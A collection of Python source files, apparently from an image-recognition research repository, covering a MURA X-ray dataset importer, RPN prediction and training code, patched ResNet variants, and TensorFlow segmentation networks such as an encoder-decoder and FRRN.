version, 'files' : main_code, 'args' : args, 'stdin' : input, 'compile_timeout' : compile_timeout, 'run_timeout' : run_timeout, 'compile_memory_limit' : compile_memory_limit, 'run_memory_limit' : run_memory_limit } return GetOutput(payload).parse_output() ```
{ "source": "aaalgo/aardvark", "score": 3 }
#### File: aardvark/mura/import14.py ```python import os import picpac PARTS = { 'XR_ELBOW': 0, 'XR_FINGER': 1, 'XR_FOREARM': 2, 'XR_HAND': 3, 'XR_HUMERUS': 4, 'XR_SHOULDER': 5, 'XR_WRIST': 6 } def load_file (path): with open(path, 'rb') as f: return f.read() def import_db (db_path, list_path): db = picpac.Writer(db_path, picpac.OVERWRITE) with open(list_path, 'r') as f: for l in f: path = l.strip() part = path.split('/')[2] #print(path) if 'positive' in path: l = 1 elif 'negative' in path: l = 0 else: assert 0 pass assert part in PARTS k = PARTS[part] label = k * 2 + l db.append(label, load_file('data/' + path), path.encode('ascii')) pass pass #import_db('scratch/train.db', 'train.list') #import_db('scratch/val.db', 'val.list') import_db('scratch/val0.db', 'val0.list') ``` #### File: aaalgo/aardvark/predict-rpn.py ```python import os import sys os.environ['TF_CPP_MIN_LOG_LEVEL'] = '2' import time from tqdm import tqdm import numpy as np import cv2 from skimage import measure # RESNET: import these for slim version of resnet import tensorflow as tf from tensorflow.python.framework import meta_graph class Model: def __init__ (self, X, anchor_th, nms_max, nms_th, is_training, path, name): mg = meta_graph.read_meta_graph_file(path + '.meta') self.predictions = tf.import_graph_def(mg.graph_def, name=name, input_map={'images:0': X, 'anchor_th:0': anchor_th, 'nms_max:0': nms_max, 'nms_th:0': nms_th, 'is_training:0': is_training, }, return_elements=['rpn_probs:0', 'rpn_shapes:0', 'rpn_index:0']) self.saver = tf.train.Saver(saver_def=mg.saver_def, name=name) self.loader = lambda sess: self.saver.restore(sess, path) pass pass flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('model', None, '') flags.DEFINE_string('input', None, '') flags.DEFINE_string('input_db', None, '') flags.DEFINE_integer('stride', 16, '') flags.DEFINE_float('anchor_th', 0.5, '') flags.DEFINE_integer('nms_max', 10000, '') flags.DEFINE_float('nms_th', 0.2, '') flags.DEFINE_float('max', None, 'max images from db') def save_prediction_image (path, image, preds): image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) rpn_probs, rpn_boxes, rpn_index = preds assert np.all(rpn_index == 0) rpn_boxes = np.round(rpn_boxes).astype(np.int32) for i in range(rpn_boxes.shape[0]): x1, y1, x2, y2 = rpn_boxes[i] cv2.rectangle(image, (x1, y1), (x2, y2), (0, 0, 255)) #boxes = np.round(boxes).astype(np.int32) #for i in range(boxes.shape[0]): # x1, y1, x2, y2 = boxes[i] # cv2.rectangle(image, (x1, y1), (x2, y2), (0, 255, 0)) cv2.imwrite(path, image) pass def main (_): X = tf.placeholder(tf.float32, shape=(None, None, None, 3), name="images") is_training = tf.constant(False, name="is_training") anchor_th = tf.constant(FLAGS.anchor_th, tf.float32) nms_max = tf.constant(FLAGS.nms_max, tf.int32) nms_th = tf.constant(FLAGS.nms_th, tf.float32) model = Model(X, anchor_th, nms_max, nms_th, is_training, FLAGS.model, 'xxx') config = tf.ConfigProto() config.gpu_options.allow_growth=True with tf.Session(config=config) as sess: model.loader(sess) if FLAGS.input: assert os.path.exists(FLAGS.input) image = cv2.imread(FLAGS.input, cv2.IMREAD_COLOR) image = cv2.cvtColor(image, cv2.COLOR_BGR2RGB) batch = np.expand_dims(image, axis=0).astype(dtype=np.float32) preds = sess.run(model.predictions, feed_dict={X: batch}) save_prediction_image(FLAGS.input + '.prob.png', image, preds) if FLAGS.input_db: assert os.path.exists(FLAGS.input_db) import picpac from gallery import Gallery picpac_config = {"db": FLAGS.input_db, "loop": False, "shuffle": False, "reshuffle": 
False, "annotate": False, "channels": 3, "stratify": False, "dtype": "float32", "colorspace": "RGB", "batch": 1, "transforms": [] } stream = picpac.ImageStream(picpac_config) gal = Gallery('output') C = 0 for _, images in stream: preds = sess.run(model.predictions, feed_dict={X: images, is_training: False}) save_prediction_image(gal.next(), images[0], preds) C += 1 if FLAGS.max and C >= FLAGS.max: break pass pass gal.flush() pass if __name__ == '__main__': tf.app.run() ``` #### File: aaalgo/aardvark/rpn3d.py ```python import os import math import sys from abc import abstractmethod import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim from nets import nets_factory, resnet_utils import aardvark import cv2 from tf_utils import * import cpp flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('rpn_priors', 'rpn_priors', 'param prior config file') flags.DEFINE_integer('rpn_params', 3, 'number of parameters per shape') flags.DEFINE_integer('rpn_stride', 1, 'downsize factor of rpn output') flags.DEFINE_float('rpn_logits_weight', 1.0, 'loss weight') flags.DEFINE_float('rpn_params_weight', 1.0, 'loss weight') class BasicRPN3D: def __init__ (self): priors = [] # read in priors # what RPN estimates is the delta between priors and the real # regression target. if os.path.exists(FLAGS.rpn_priors): with open(FLAGS.rpn_priors, 'r') as f: for l in f: if l[0] == '#': continue vs = [float(v) for v in l.strip().split(' ')] assert len(vs) == FLAGS.rpn_params priors.append(vs) pass pass pass if len(priors) == 0: priors.append([1.0] * FLAGS.rpn_params) pass aardvark.print_red("PRIORS %s" % str(priors)) self.priors = np.array(priors, dtype=np.float32) pass def rpn_backbone (self, volume, is_training, stride): assert False def rpn_logits (self, net, is_training, channels): assert False def rpn_params (self, net, is_training, channels): assert False def rpn_generate_shapes (self, shape, anchor_params, priors, n_priors): assert False def build_rpn (self, volume, is_training, shape=None): # volume: input volume tensor Z,Y,X = shape assert max(Z % FLAGS.rpn_stride, Y % FLAGS.rpn_stride, X % FLAGS.rpn_stride) == 0 oZ = Z // FLAGS.rpn_stride oY = Y // FLAGS.rpn_stride oX = X // FLAGS.rpn_stride n_priors = self.priors.shape[0] n_params = self.priors.shape[1] self.gt_anchors = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) self.gt_anchors_weight = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) # parameter of that location self.gt_params = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors, n_params)) self.gt_params_weight = tf.placeholder(tf.float32, shape=(None, oZ, oY, oX, n_priors)) self.backbone = self.rpn_backbone(volume, is_training, FLAGS.rpn_stride) logits = self.rpn_logits(self.backbone, is_training, n_priors) logits = tf.identity(logits, name='logits') self.logits = logits self.probs = tf.sigmoid(logits, name='probs') params = self.rpn_params(self.backbone, is_training, n_priors * n_params) params = tf.identity(params, name='params') self.params = params # setup losses # 1. 
losses for logits logits1 = tf.reshape(logits, (-1,)) gt_anchors = tf.reshape(self.gt_anchors, (-1,)) gt_anchors_weight = tf.reshape(self.gt_anchors_weight, (-1,)) xe = tf.nn.sigmoid_cross_entropy_with_logits(logits=logits1, labels=tf.cast(gt_anchors, tf.float32)) xe = tf.reduce_sum(xe * gt_anchors_weight) / (tf.reduce_sum(gt_anchors_weight) + 0.00001) xe = tf.identity(xe, name='xe') getattr(self, 'metrics', []).append(xe) tf.losses.add_loss(xe * FLAGS.rpn_logits_weight) # 2. losses for parameters priors = tf.constant(self.priors[np.newaxis, :, :], dtype=tf.float32) params = tf.reshape(params, (-1, n_priors, n_params)) gt_params = tf.reshape(self.gt_params, (-1, n_priors, n_params)) l1 = tf.losses.huber_loss(params, gt_params / priors, reduction=tf.losses.Reduction.NONE, loss_collection=None) l1 = tf.reduce_sum(l1, axis=2) # l1: ? * n_priors l1 = tf.reshape(l1, (-1,)) gt_params_weight = tf.reshape(self.gt_params_weight, (-1,)) l1 = tf.reduce_sum(l1 * gt_params_weight) / (tf.reduce_sum(gt_params_weight) + 0.00001) l1 = tf.identity(l1, name='l1') getattr(self, 'metrics', []).append(l1) tf.losses.add_loss(l1 * FLAGS.rpn_params_weight) pass ``` #### File: aaalgo/aardvark/train-basic-keypoints.py ```python import os import sys sys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), 'zoo/slim')) import logging import numpy as np import tensorflow as tf import tensorflow.contrib.slim as slim import aardvark from tf_utils import * flags = tf.app.flags FLAGS = flags.FLAGS flags.DEFINE_string('finetune', None, '') flags.DEFINE_string('backbone', 'resnet_v2_50', 'architecture') flags.DEFINE_integer('backbone_stride', 16, '') flags.DEFINE_integer('feature_channels', 64, '') flags.DEFINE_integer('stride', 4, '') flags.DEFINE_integer('radius', 25, '') flags.DEFINE_float('offset_weight', 1, '') PIXEL_MEANS = tf.constant([[[[103.94, 116.78, 123.68]]]]) # VGG PIXEL MEANS USED BY TF def params_loss (dxy, dxy_gt): l1 = tf.losses.huber_loss(dxy, dxy_gt, reduction=tf.losses.Reduction.NONE, loss_collection=None) return tf.reduce_sum(l1, axis=1) class Model (aardvark.Model): def __init__ (self): super().__init__() if FLAGS.classes > 1: aardvark.print_red("Classes should be number of point classes,") aardvark.print_red("not counting background. 
Usually 1.") pass def extra_stream_config (self, is_training): augments = aardvark.load_augments(is_training) shift = 0 if is_training: shift = FLAGS.clip_shift return { "annotate": [1], "transforms": [{"type": "resize", "max_size": FLAGS.max_size} ] + augments + [ {"type": "clip", "shift": shift, "width": FLAGS.fix_width, "height": FLAGS.fix_height, "round": FLAGS.clip_stride}, {"type": "keypoints.basic", 'downsize': FLAGS.stride, 'classes': FLAGS.classes, 'radius': FLAGS.radius}, #{"type": "anchors.dense.point", 'downsize': FLAGS.stride, 'lower_th': anchor_th, 'upper_th': anchor_th}, {"type": "drop"}, # remove original annotation ] } def feed_dict (self, record, is_training = True): _, images, _, mask, offsets = record return {self.is_training: is_training, self.images: images, self.mask: mask, self.gt_offsets: offsets} def build_graph (self): if True: # setup inputs # parameters is_training = tf.placeholder(tf.bool, name="is_training") images = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.channels), name="images") # the reset are for training only mask = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.classes)) gt_offsets = tf.placeholder(tf.float32, shape=(None, None, None, FLAGS.classes*2)) self.is_training = is_training self.images = images self.mask = mask self.gt_offsets = gt_offsets backbone = aardvark.create_stock_slim_network(FLAGS.backbone, images, is_training, global_pool=False, stride=FLAGS.backbone_stride) with tf.variable_scope('head'), slim.arg_scope(aardvark.default_argscope(is_training)): if FLAGS.finetune: backbone = tf.stop_gradient(backbone) #net = slim_multistep_upscale(net, FLAGS.backbone_stride / FLAGS.stride, FLAGS.reduction) #backbone = net stride = FLAGS.backbone_stride // FLAGS.stride #backbone = slim.conv2d_transpose(backbone, FLAGS.feature_channels, st*2, st) #prob = slim.conv2d(backbone, FLAGS.classes, 3, 1, activation_fn=tf.sigmoid) prob = slim.conv2d_transpose(backbone, FLAGS.classes, stride*2, stride, activation_fn=tf.sigmoid) #logits2 = tf.reshape(logits, (-1, 2)) #prob2 = tf.squeeze(tf.slice(tf.nn.softmax(logits2), [0, 1], [-1, 1]), 1) #tf.reshape(prob2, tf.shape(mask), name='prob') #xe = tf.nn.sparse_softmax_cross_entropy_with_logits(logits=logits2, labels=mask) dice = tf.identity(dice_loss(mask, prob), name='di') tf.losses.add_loss(dice) self.metrics.append(dice) offsets = slim.conv2d_transpose(backbone, FLAGS.classes*2, stride*2, stride, activation_fn=None) offsets2 = tf.reshape(offsets, (-1, 2)) # ? 
* 4 gt_offsets2 = tf.reshape(gt_offsets, (-1,2)) mask2 = tf.reshape(mask, (-1,)) pl = params_loss(offsets2, gt_offsets2) * mask2 pl = tf.reduce_sum(pl) / (tf.reduce_sum(mask2) + 1) pl = tf.check_numerics(pl * FLAGS.offset_weight, 'pl', name='p1') # params-loss tf.losses.add_loss(pl) self.metrics.append(pl) tf.identity(prob, name='prob') tf.identity(offsets, 'offsets') if FLAGS.finetune: assert FLAGS.colorspace == 'RGB' def is_trainable (x): return x.startswith('head') self.init_session, self.variables_to_train = aardvark.setup_finetune(FLAGS.finetune, is_trainable) pass def main (_): model = Model() aardvark.train(model) pass if __name__ == '__main__': try: tf.app.run() except KeyboardInterrupt: pass ``` #### File: aardvark/zoo/fuck_slim.py ```python import tensorflow as tf import tensorflow.contrib.slim as slim from nets import nets_factory, resnet_utils, resnet_v2 def patch_resnet_arg_scope (is_training): def resnet_arg_scope (weight_decay=0.0001): print('\033[91m' + 'Using patched resnet arg scope' + '\033[0m') batch_norm_decay=0.9 batch_norm_epsilon=5e-4 batch_norm_scale=False activation_fn=tf.nn.relu use_batch_norm=True batch_norm_params = { 'decay': batch_norm_decay, 'epsilon': batch_norm_epsilon, 'scale': batch_norm_scale, 'updates_collections': tf.GraphKeys.UPDATE_OPS, # don't know what it does, but seems improves cifar10 a bit #'fused': None, # Use fused batch norm if possible. 'is_training': is_training } with slim.arg_scope( [slim.conv2d, slim.conv2d_transpose], weights_regularizer=slim.l2_regularizer(weight_decay), #Removing following 2 improves cifar10 performance #weights_initializer=slim.variance_scaling_initializer(), activation_fn=activation_fn, normalizer_fn=slim.batch_norm if use_batch_norm else None, normalizer_params=batch_norm_params): with slim.arg_scope([slim.batch_norm], **batch_norm_params): with slim.arg_scope([slim.max_pool2d], padding='SAME'): with slim.arg_scope([slim.dropout], is_training=is_training) as arg_sc: return arg_sc return resnet_arg_scope def patch (is_training): asc = patch_resnet_arg_scope(is_training) keys = [key for key in nets_factory.arg_scopes_map.keys() if 'resnet_' in key or 'densenet' in key] for key in keys: nets_factory.arg_scopes_map[key] = asc def resnet_v2_14_nmist (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, include_root_block=False, spatial_squeeze=True, scope='resnet_v2_14_nist', reduction=2): resnet_v2_block = resnet_v2.resnet_v2_block blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=2, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=2, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=2, stride=1), ] return resnet_v2.resnet_v2( inputs, blocks, num_classes, is_training, global_pool, output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def resnet_v2_18 (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, include_root_block=True, spatial_squeeze=True, scope='resnet_v2_18', reduction=1): resnet_v2_block = resnet_v2.resnet_v2_block blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=2, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=2, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=2, stride=2), resnet_v2_block('block4', base_depth=512//reduction, num_units=2, stride=1), ] return resnet_v2.resnet_v2( inputs, blocks, num_classes, 
is_training, global_pool, output_stride, include_root_block=include_root_block, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def resnet_v2_18_cifar (inputs, num_classes=None, is_training=True, global_pool=False, output_stride=None, reuse=None, scope='resnet_v2_18_cifar', spatial_squeeze=True): #assert global_pool return resnet_v2_18(inputs, num_classes, is_training, global_pool=global_pool, output_stride=output_stride, reuse=reuse, include_root_block=False, scope=scope, spatial_squeeze=spatial_squeeze) def resnet_v2_18_slim (inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, reuse=None, scope='resnet_v2_18_slim', spatial_squeeze=True): return resnet_v2_18(inputs, num_classes, is_training, global_pool=global_pool, output_stride=output_stride, reuse=reuse, include_root_block=True, scope=scope, reduction=2, spatial_squeeze=spatial_squeeze) def resnet_v2_50_slim(inputs, num_classes=None, is_training=True, global_pool=True, output_stride=None, spatial_squeeze=True, reuse=None, scope='resnet_v2_50'): """ResNet-50 model of [1]. See resnet_v2() for arg and return description.""" resnet_v2_block = resnet_v2.resnet_v2_block reduction=2 blocks = [ resnet_v2_block('block1', base_depth=64//reduction, num_units=3, stride=2), resnet_v2_block('block2', base_depth=128//reduction, num_units=4, stride=2), resnet_v2_block('block3', base_depth=256//reduction, num_units=6, stride=2), resnet_v2_block('block4', base_depth=512//reduction, num_units=3, stride=1), ] return resnet_v2.resnet_v2(inputs, blocks, num_classes, is_training=is_training, global_pool=global_pool, output_stride=output_stride, include_root_block=True, spatial_squeeze=spatial_squeeze, reuse=reuse, scope=scope) def extend (): nets_factory.networks_map['resnet_v2_14_nmist'] = resnet_v2_14_nmist nets_factory.networks_map['resnet_v2_18'] = resnet_v2_18 nets_factory.networks_map['resnet_v2_18_cifar'] = resnet_v2_18_cifar nets_factory.networks_map['resnet_v2_18_slim'] = resnet_v2_18_slim nets_factory.networks_map['resnet_v2_50_slim'] = resnet_v2_50_slim nets_factory.arg_scopes_map['resnet_v2_14_nmist'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18_cifar'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_18_slim'] = resnet_v2.resnet_arg_scope nets_factory.arg_scopes_map['resnet_v2_50_slim'] = resnet_v2.resnet_arg_scope pass ``` #### File: zoo/sss/custom_model.py ```python from __future__ import division import os,time,cv2 import tensorflow as tf import tensorflow.contrib.slim as slim import numpy as np def conv_block(inputs, n_filters, filter_size=[3, 3], dropout_p=0.0): """ Basic conv block for Encoder-Decoder Apply successivly Convolution, BatchNormalization, ReLU nonlinearity Dropout (if dropout_p > 0) on the inputs """ conv = slim.conv2d(inputs, n_filters, filter_size, activation_fn=None, normalizer_fn=None) out = tf.nn.relu(slim.batch_norm(conv, fused=True)) if dropout_p != 0.0: out = slim.dropout(out, keep_prob=(1.0-dropout_p)) return out def conv_transpose_block(inputs, n_filters, filter_size=[3, 3], dropout_p=0.0): """ Basic conv transpose block for Encoder-Decoder upsampling Apply successivly Transposed Convolution, BatchNormalization, ReLU nonlinearity Dropout (if dropout_p > 0) on the inputs """ conv = slim.conv2d_transpose(inputs, n_filters, kernel_size=[3, 3], stride=[2, 2]) out = tf.nn.relu(slim.batch_norm(conv, fused=True)) if dropout_p != 0.0: out = slim.dropout(out, 
keep_prob=(1.0-dropout_p)) return out def build_encoder_decoder_skip(inputs, num_classes, dropout_p=0.5, scope=None): """ Builds the Encoder-Decoder-Skip model. Inspired by SegNet with some modifications Includes skip connections Arguments: inputs: the input tensor n_classes: number of classes dropout_p: dropout rate applied after each convolution (0. for not using) Returns: Encoder-Decoder model """ ##################### # Downsampling path # ##################### net = conv_block(inputs, 64) net = conv_block(net, 64) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_1 = net net = conv_block(net, 128) net = conv_block(net, 128) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_2 = net net = conv_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 256) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_3 = net net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') skip_4 = net net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') ##################### # Upsampling path # ##################### net = conv_transpose_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = tf.add(net, skip_4) net = conv_transpose_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 512) net = conv_block(net, 256) net = tf.add(net, skip_3) net = conv_transpose_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 256) net = conv_block(net, 128) net = tf.add(net, skip_2) net = conv_transpose_block(net, 128) net = conv_block(net, 128) net = conv_block(net, 64) net = tf.add(net, skip_1) net = conv_transpose_block(net, 64) net = conv_block(net, 64) net = conv_block(net, 64) ##################### # Softmax # ##################### net = slim.conv2d(net, num_classes, [1, 1], scope='logits') return net ``` #### File: zoo/sss/FRRN.py ```python import tensorflow as tf from tensorflow.contrib import slim import resnet_v1 def Upsampling(inputs,scale): return tf.image.resize_nearest_neighbor(inputs, size=[tf.shape(inputs)[1]*scale, tf.shape(inputs)[2]*scale]) def Unpooling(inputs,scale): return tf.image.resize_bilinear(inputs, size=[tf.shape(inputs)[1]*scale, tf.shape(inputs)[2]*scale]) def ResidualUnit(inputs, n_filters=48, filter_size=3): """ A local residual unit Arguments: inputs: The input tensor n_filters: Number of output feature maps for each conv filter_size: Size of convolution kernel Returns: Output of local residual block """ net = slim.conv2d(inputs, n_filters, filter_size, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = slim.conv2d(net, n_filters, filter_size, activation_fn=None) net = slim.batch_norm(net, fused=True) return net def FullResolutionResidualUnit(pool_stream, res_stream, n_filters_3, n_filters_1, pool_scale): """ A full resolution residual unit Arguments: pool_stream: The inputs from the pooling stream res_stream: The inputs from the residual stream n_filters_3: Number of output feature maps for each 3x3 conv n_filters_1: Number of output feature maps for each 1x1 conv pool_scale: scale of the pooling layer i.e window size and stride Returns: Output of full resolution residual block """ G = tf.concat([pool_stream, slim.pool(res_stream, [pool_scale, pool_scale], stride=[pool_scale, pool_scale], pooling_type='MAX')], axis=-1) net = slim.conv2d(G, 
n_filters_3, kernel_size=3, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = slim.conv2d(net, n_filters_3, kernel_size=3, activation_fn=None) net = slim.batch_norm(net, fused=True) pool_stream_out = tf.nn.relu(net) net = slim.conv2d(pool_stream_out, n_filters_1, kernel_size=1, activation_fn=None) net = Upsampling(net, scale=pool_scale) res_stream_out = tf.add(res_stream, net) return pool_stream_out, res_stream_out def build_frrn(inputs, num_classes, preset_model='FRRN-A'): """ Builds the Full Resolution Residual Network model. Arguments: inputs: The input tensor preset_model: Which model you want to use. Select FRRN-A or FRRN-B num_classes: Number of classes Returns: FRRN model """ if preset_model == 'FRRN-A': ##################### # Initial Stage ##################### net = slim.conv2d(inputs, 48, kernel_size=5, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) ##################### # Downsampling Path ##################### pool_stream = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') res_stream = slim.conv2d(net, 32, kernel_size=1, activation_fn=None) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) ##################### # Upsampling Path ##################### pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, 
n_filters_1=32, pool_scale=8) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = Unpooling(pool_stream, 2) ##################### # Final Stage ##################### net = tf.concat([pool_stream, res_stream], axis=-1) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None, scope='logits') return net elif preset_model == 'FRRN-B': ##################### # Initial Stage ##################### net = slim.conv2d(inputs, 48, kernel_size=5, activation_fn=None) net = slim.batch_norm(net, fused=True) net = tf.nn.relu(net) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) ##################### # Downsampling Path ##################### pool_stream = slim.pool(net, [2, 2], stride=[2, 2], pooling_type='MAX') res_stream = slim.conv2d(net, 32, kernel_size=1, activation_fn=None) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=8) pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=16) 
pool_stream = slim.pool(pool_stream, [2, 2], stride=[2, 2], pooling_type='MAX') pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=32) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=384, n_filters_1=32, pool_scale=32) ##################### # Upsampling Path ##################### pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=17) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=16) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=8) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=192, n_filters_1=32, pool_scale=4) pool_stream = Unpooling(pool_stream, 2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream, res_stream = FullResolutionResidualUnit(pool_stream=pool_stream, res_stream=res_stream, n_filters_3=96, n_filters_1=32, pool_scale=2) pool_stream = Unpooling(pool_stream, 2) ##################### # Final Stage ##################### net = tf.concat([pool_stream, res_stream], axis=-1) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = ResidualUnit(net, n_filters=48, filter_size=3) net = slim.conv2d(net, num_classes, [1, 1], activation_fn=None, scope='logits') return net else: raise 